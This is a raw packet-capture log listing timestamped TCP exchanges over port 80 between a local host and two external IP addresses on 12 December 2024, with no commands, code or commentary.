                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.923198938 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.924060106 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.924094915 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.924279928 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.924320936 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.925013065 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.925056934 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.925333977 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.925384998 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.926074982 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.926122904 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.926651955 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.926695108 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.926974058 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.927011013 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.927084923 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.927123070 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.928081989 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.928127050 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.928354979 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.928397894 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.928977966 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.929028034 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.929841042 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.929910898 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.930013895 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.930023909 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.930047989 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.930165052 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.930895090 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.930932045 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.930952072 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.930985928 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.931935072 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.931972980 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.932086945 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.932122946 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.932894945 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.932930946 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.932982922 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.933023930 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.933877945 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.933909893 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.934144020 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.934178114 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.934896946 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.934941053 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.935164928 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.935199022 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.936064005 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.936095953 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.936136007 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.936172009 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.937027931 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.937071085 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.937282085 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.937345028 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.937741995 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.937778950 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.938493967 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.938530922 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.938826084 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.938838959 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.938860893 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.938888073 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.939764977 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.939776897 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.939798117 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.939814091 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.940726995 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.940762997 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.941528082 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.941560030 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.941946030 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.941958904 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.941982985 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.942001104 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.942739010 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.942749977 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.942781925 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.942806005 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.943566084 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.943603992 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.943933964 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.943980932 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.944601059 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.944613934 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.944648981 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.944664955 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.945609093 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.945624113 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.945641041 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.945661068 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.946644068 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.946681023 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.946707010 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.946739912 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.947482109 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.947520018 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.947599888 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.947638035 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.948499918 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.948537111 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.949466944 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.949477911 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.949501038 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.949516058 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.949517965 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.949546099 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.950414896 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.950453043 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.950540066 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.950578928 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.951436043 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.951467037 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.951678038 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.951723099 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.952346087 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.952383995 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.952742100 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.952780008 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.953341961 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.953397036 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.954168081 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.954210997 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.954395056 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.954406023 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.954446077 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.955346107 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.955393076 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.955893040 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.955935001 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.956284046 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.956322908 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.956423998 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.956463099 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.956621885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.956816912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.956897020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.957118988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.957221031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.957289934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.957392931 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.957434893 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.957510948 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.957549095 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.957958937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.958113909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.958180904 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.959140062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.959644079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.959718943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.959955931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.961061001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.961071014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.961081028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.961129904 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.961153030 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.961976051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.962236881 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.962307930 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.962986946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.963634014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.963716984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.964009047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.964776993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.964864969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.965029955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.965348959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.965428114 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.968146086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.968306065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.968317032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.968374014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.968385935 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.968389034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.968400002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.968417883 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.968444109 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.969125032 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.969525099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.969613075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.970185041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.970199108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.970273018 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.971131086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.971273899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.971347094 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.972111940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.972424030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.972503901 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.973109007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.974206924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.974222898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.974234104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.974298954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.974298954 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.975177050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.975459099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.975536108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.976262093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.977255106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.977269888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.977355003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.977369070 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.977397919 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.978197098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.978523016 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.978599072 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.979322910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.979334116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.979414940 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.980278969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.981065989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.981143951 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.981323957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.981334925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.981411934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.982249022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.982604027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.982686996 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.983382940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.983395100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.983493090 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.984285116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.984616995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.984699011 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.985491991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.985503912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.985589981 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.986443996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.986454010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.986546993 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.987410069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.987535954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.987613916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.988384008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.989248991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.989325047 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.989460945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.989995956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.990068913 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.990593910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.990998983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.991076946 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.991538048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.991549969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.991641998 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.992513895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.992825031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.992902994 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.993654013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.994657993 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.994668961 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.994678974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.994735956 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.994765043 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.995701075 CET8049946185.81.68.147192.168.2.10
